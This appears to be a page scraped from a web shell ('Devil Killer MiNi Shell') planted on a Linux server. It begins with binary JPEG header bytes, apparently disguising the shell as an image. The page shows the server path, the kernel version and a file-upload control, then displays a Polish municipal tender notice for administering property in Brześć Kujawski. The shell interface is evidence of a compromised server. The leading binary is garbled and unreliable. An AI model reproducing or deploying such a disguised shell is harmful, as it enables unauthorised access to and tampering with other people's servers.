JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250521/0024176101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Administrowanie nieruchomościami gminnymi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BRZEŚĆ KUJAWSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866815</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Władysława Łokietka 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brześć Kujawski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-880</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@brzesckujawski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.brzesckujawski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Administrowanie nieruchomościami gminnymi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2ada6d54-1565-454e-b39a-8ee696bc5aeb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00241761</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00003140/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Administrowanie nieruchomościami gminnymi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://e-propublico.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://e-propublico.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa następujące<br/>wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z<br/>Platformy:<br/>a) stały dostęp do sieci Internet;<br/>b) posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail),<br/>c) komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo Linux,<br/>d) zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi,<br/>stabilnymi wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft<br/>Edge, Mozilla Firefox, Google Chrome, Opera),<br/>e) włączona obsługa JavaScript oraz Cookies.<br/>Zamawiający dopuszcza następujący format przesyłanych danych: pliki w formatach określonych<br/>odpowiednimi przepisami prawa, tj. m.in.: .doc, .docx, .txt, .xls, .xlsx, .ppt, .csv, .pdf, .jpg, .git, .png, .tif,<br/>.dwg, .ath, .kst, .zip, .rar, przy czym zaleca się wykorzystywanie plików w formacie .pdf, .doc, .docx.,<br/>.xlsx, .xml. Maksymalny rozmiar pojedynczego pliku to 80 MB, przy czym nie określa się limitu liczby plików.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że;<br/>1) udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków<br/>skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o<br/>których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie;<br/>2) udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych<br/>osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych<br/>ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub<br/>światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych,<br/>danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych<br/>dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku<br/>postępowania o udzielenie zamówienia;<br/>3) w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego,<br/>z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem Wykonawcy do<br/>uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące,<br/>prawem Wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w<br/>art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od administratora kopii<br/>danych osobowych podlegających przetwarzaniu), Zamawiający może żądać od osoby występującej z<br/>żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia;<br/>4) skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia, o którym mowa w<br/>art. 16 RODO (uprawnienie do sprostowania lub uzupełnienia danych osobowych), nie może naruszać<br/>integralności protokołu postępowania oraz jego załączników.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym<br/>mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania;<br/>2) w przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO<br/>spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BI.II.271.15.2025.NŻ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy opis przedmiotu zamówienia:<br/>I.	Tężnia solankowa oraz Deptak<br/>Gmina jest właścicielem nieruchomości zabudowanych położonych w Wieńcu Zdroju obręb geodezyjny Wieniec Zalesie oznaczonych geodezyjnie:<br/>a) nr 232/3 o powierzchni 0,0667 ha opisanej przy w księdze wieczystej prowadzonej przez Sąd Rejonowy we Włocławku Wydział Ksiąg Wieczystych <br/>Nr WL1W/00107765/5. Nieruchomość zabudowana jest obiektem Tężni Solankowej z infrastrukturą.<br/>b) nr 233/3 o powierzchni 0,0717 ha będącej własnością Skarbu Państwa <br/>w użytkowaniu wieczystym Gminy Brześć Kujawski do 2089-12-05, opisanej <br/>w księdze wieczystej prowadzonej przez Sąd Rejonowy we Włocławku Wydział Ksiąg Wieczystych Nr WL1W/00107766/2. Nieruchomość zabudowana jest obiektem Tężni Solankowej z infrastrukturą, zwaną dalej Tężnią.<br/>c) nr 230 o powierzchni 0,4300 ha opisanej w księdze wieczystej prowadzonej przez Sąd Rejonowy we Włocławku Wydział Ksiąg Wieczystych <br/>Nr WL1W/00074315/5. Nieruchomość w części zabudowana jest obiektem Tężni Solankowej z infrastrukturą a w części stanowi ulicę Zdrojową w tym deptak, zwaną Deptakiem.<br/>Administrator, w ramach realizacji niniejszej umowy zobowiązuje <br/>się do administrowania obiektem Tężni i Deptakiem w zakresie:<br/>1)	organizowanie prawidłowego funkcjonowania i pracy Tężni oraz Deptaku,<br/>2)	zapewnianie utrzymania porządku i czystości na terenie Tężni Solankowej, w jej obrębie oraz na deptaku przy ulicy Zdrojowej, ręczne lub/i mechaniczne oczyszczanie, polegające na usuwaniu wszelkich zanieczyszczeń co najmniej jeden raz dziennie, zapewnianie odbioru powstających na terenie odpadów,<br/>3)	prowadzenie zimowego utrzymania: odśnieżanie, posypywanie piaskiem, usuwanie śliskości pośniegowej, gołoledzi z nawierzchni ciągów komunikacyjnych, zadaszeń - każdorazowo po wystąpieniu zjawiska, usuwanie nawisów śnieżnych i lodowych wraz z wywozem śniegu, lodu i innych zanieczyszczeń, zapewnienie stałej drożności dróg dojazdowych we wszystkich występujących w ciągach pieszych kierunkach. Szerokość odśnieżonego, odlodzonego i oszronionego przejścia nie może być mniejsza niż 2 m lub deptaku,<br/>4)	dokonywanie bieżących napraw i konserwacji technicznej Tężni <br/>i Deptaku,<br/>5)	dokonywanie bieżącej pielęgnacji roślin i nasadzeń w obrębie Tężni <br/>i Deptaku,<br/>6)	zapewnianie organizacji Tężni i deptaku w przypadku powstania awarii <br/>i zdarzeń losowych,<br/>7)	nadzorowanie i egzekwowanie obowiązków i praw najemców Tężni <br/>i Deptaku,<br/>8)	rozstrzyganie kwestii spornych pomiędzy najemcami/użytkownikami Tężni i Deptaku oraz administratorem Tężni i Deptaku, zaistniałych na jego terenie,<br/>9)	zapewniania właściwego stanu technicznego oraz estetycznego obiektów,<br/>10)	bilansowanie i zgłaszanie właścicielowi potrzeb modernizacyjnych oraz remontowych,<br/>11) dostawa naturalnej solanki i przetoczenie jej do zbiornika uzupełniającego tężni solankowej.<br/> Administrator zobowiązuje się również do:<br/>1) wykonania usługi administrowania Tężnią i Deptakiem zgodnie z ustaleniami umowy przy uwzględnieniu obowiązujących w tym zakresie przepisów prawa,<br/>2) przekazywania niezwłocznie informacji dotyczących realizacji przedmiotu umowy na każde żądanie Gminy,<br/>3) przestrzegania poufności, co do informacji pozyskanych w związku <br/>z realizacją, w szczególności do przestrzegania przepisów dotyczących ochrony danych osobowych RODO,<br/>4) dysponowania personelem posiadającym stosowne kwalifikacje w zakresie gwarantującym optymalną realizację przedmiotu umowy,<br/>5) umożliwienia przeprowadzenia kontroli przez przedstawicieli Gminy, mającą na celu weryfikację jakości i rzetelności wykonywania usługi w okresie obowiązywania umowy.<br/><br/><br/>II.	Amfiteatr<br/>Gmina jest właścicielem nieruchomości zabudowanej położonej w Wieńcu Zdroju przy ul. Wienieckiej 6 oznaczonej geodezyjnie nr 229/2 o powierzchni 0,2062 ha będącej własnością Skarbu Państwa w użytkowaniu wieczystym Gminy Brześć Kujawski do 2089-12-05, opisanej w księdze wieczystej prowadzonej przez Sąd Rejonowy we Włocławku Wydział Ksiąg Wieczystych KW Nr WL1W/00107767/9. Nieruchomość zabudowana jest obiektem Amfiteatru.<br/>Administrator, w ramach realizacji niniejszej umowy zobowiązuje <br/>się do administrowania Amfiteatrem w zakresie:<br/>1)	Organizowanie prawidłowego funkcjonowania i pracy Amfiteatru,<br/>2)	Zapewnianie utrzymania porządku i czystości na terenie Amfiteatru, <br/>w jego pomieszczeniach oraz na terenie przynależnym, ręczne lub/i mechaniczne oczyszczanie, polegające na usuwaniu wszelkich zanieczyszczeń co najmniej jeden raz dziennie, zapewnianie odbioru powstających na terenie odpadów,<br/>3)	Prowadzenie zimowego utrzymania: odśnieżanie, posypywanie piaskiem, usuwanie śliskości pośniegowej, gołoledzi z nawierzchni ciągów komunikacyjnych, zadaszeń - każdorazowo po wystąpieniu zjawiska, usuwanie nawisów śnieżnych i lodowych wraz z wywozem śniegu, lodu i innych zanieczyszczeń, zapewnienie stałej drożności dróg dojazdowych we wszystkich występujących w ciągach pieszych kierunkach. Szerokość odśnieżonego, odlodzonego i oszronionego przejścia nie może być mniejsza niż 2 m.<br/>4)	dokonywanie bieżących napraw i konserwacji pomieszczeń wraz <br/>z terenem widowiskowym oraz pozostałej infrastruktury,<br/>5)	zapewnianie funkcjonowanie Amfiteatru na wypadek powstania awarii <br/>i zdarzeń losowych,<br/>6)	nadzorowanie i egzekwowanie obowiązków i praw najemców pomieszczeń w budynku Amfiteatru,<br/>7)	rozstrzyganie kwestii spornych pomiędzy najemcami/użytkownikami Amfiteatru oraz administratorem Amfiteatru, zaistniałych na jego terenie,<br/>8)	zapewnianie właściwego stanu technicznego oraz estetycznego obiektu,<br/>9)	bilansowanie i zgłaszanie właścicielowi potrzeb modernizacyjnych oraz remontowych.<br/><br/><br/>III.	Targowisko Miejskie<br/>Gmina jest właścicielem nieruchomości zabudowanych położonych w Brześciu Kujawskim przy Al. Wł. Łokietka 1 B-F obręb geodezyjny 3, oznaczonych geodezyjnie:<br/>a) nr 151/1 o powierzchni 1,6706 ha opisanej w księdze wieczystej prowadzonej przez Sąd Rejonowy we Włocławku Nr WL1W/00059128/6. Nieruchomość zabudowana jest placem z kostki brukowej do handlu z &#34;wolnej ręki&#34;, parkingami, drogami wewnętrznymi i budynkami:<br/>-	transportu i łączności - nr ewid budynku 326,<br/>-	pozostałe budynki niemieszkalne - nr ewid. budynków 305 i 328,<br/>-	handlowo - usługowymi - nr ewid. budynków 876, 877, 878 i 879.<br/>b) nr 133/2 o powierzchni 0,2480 ha opisanej w księdze wieczystej prowadzonej przez Sąd Rejonowy we Włocławku Nr WL1W/00040394/5. Nieruchomość zabudowana jest miejscami z kostki brukowej do handlu produktami rolnymi z pojazdów gastronomicznych, naczep i przyczep ciągnikowych, parkingami, drogami wewnętrznymi i budynkami:<br/>-	pozostałe budynki niemieszkalne - nr ewid. budynków 305, 307, 308,<br/>-	biurowe - nr ewid. budynku 306.<br/>Gmina przekazuje Administratorowi w administrowanie z nieruchomości ww. teren obejmujący plac targowy:<br/>a) w pkt a) część działki o powierzchni 0,5841 ha z placem z kostki brukowej do handlu z &#34;wolnej ręki&#34;, parkingami, drogami wewnętrznymi i z budynkami:<br/>-	transportu i łączności - nr ewid budynku 326,<br/>-	handlowo - usługowymi - nr ewid. budynków 876, 877, 878 i 879.<br/>b) w pkt b) część działki o powierzchni 0,1947 ha z miejscami z kostki brukowej do handlu produktami rolnymi z pojazdów gastronomicznych, naczep <br/>i przyczep ciągnikowych, parkingami, drogami wewnętrznymi - bez budynków.<br/>Administrator w ramach realizacji niniejszej umowy zobowiązuje się <br/>do administrowania Targowiskiem Miejskim obejmującym plac targowy, zgodnie z:<br/>1.	Uchwałą Nr LXV/627/2024 Rady Miejskiej w Brześciu Kujawskim z dnia 17 kwietnia 2024 r. w sprawie przyjęcia Regulaminu Targowiska Miejskiego &#34;Mój Rynek&#34; w Brześciu Kujawskim,<br/>2.	Uchwałą Nr VI/33/2024 Rady Miejskiej w Brześciu Kujawskim z dnia <br/>28 października 2024 r. w sprawie wyznaczenia miejsc do prowadzenia handlu przez rolników i ich domowników produktami rolnymi lub spożywczymi oraz przyjęcia Regulaminu określającego zasady prowadzenia tego handlu.<br/>3.	Uchwałą Nr VI/34/2024 Rady Miejskiej w Brześciu Kujawskim z dnia <br/>28 października 2024r. zmieniającą uchwałę Nr LXV/627/2024 Rady Miejskiej <br/>w Brześciu Kujawskim z dnia 17 kwietnia 2024 r. w sprawie przyjęcia Regulaminu Targowiska Miejskiego &#34;Mój Rynek&#34; w Brześciu Kujawskim.<br/>4.	Uchwałą Nr VII/41/2024 Rady Miejskiej w Brześciu Kujawskim z dnia <br/>19 listopada 2024r. zmieniająca uchwałę nr VI/33/2024 Rady Miejskiej <br/>w Brześciu Kujawskim z dnia 28 października 2024 r. w sprawie wyznaczenia miejsc <br/>do prowadzenia handlu przez rolników i ich domowników produktami rolnymi lub spożywczymi oraz przyjęcia Regulaminu określającego zasady prowadzenia tego handlu.<br/>5. Uchwałą Nr VII/44/2024 Rady Miejskiej w Brześciu Kujawskim z dnia <br/>19 listopada 2024r. w sprawie wprowadzenia opłaty targowej, określenia zasad jej ustalania i poboru oraz terminu płatności i wysokości stawki tej opłaty. <br/>6.	Zarządzeniem Nr 233/2024 Burmistrza Brześcia Kujawskiego z dnia <br/>19 listopada 2024 r. w sprawie wysokości cen opłat i sposobu dokonywania rezerwacji za korzystanie ze stanowisk handlowych na Targowisku Miejskim <br/>z wydzieloną częścią Mój Rynek w Brześciu Kujawskim.<br/>Administrator, w ramach realizacji niniejszej umowy zobowiązuje się <br/>do administrowania Targowiskiem Miejskim &#34;Mój Rynek&#34; w Brześciu Kujawskim, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70330000-3 - Usługi zarządzania nieruchomościami na zasadzie bezpośredniej płatności lub umowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">70332000-7 - Usługi w zakresie nieruchomości innych niż mieszkalne</p> <p class="mb-0">79993100-2 - Usługi zarządzania urządzeniami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty przyznane przez każdego z członków Komisji przetargowej zostaną zsumowane dla każdego z kryteriów oddzielnie. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na zgłoszenie serwisowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie wykonawcy w sprawie grupy kapitałowej</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do ustanowienia pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>2. 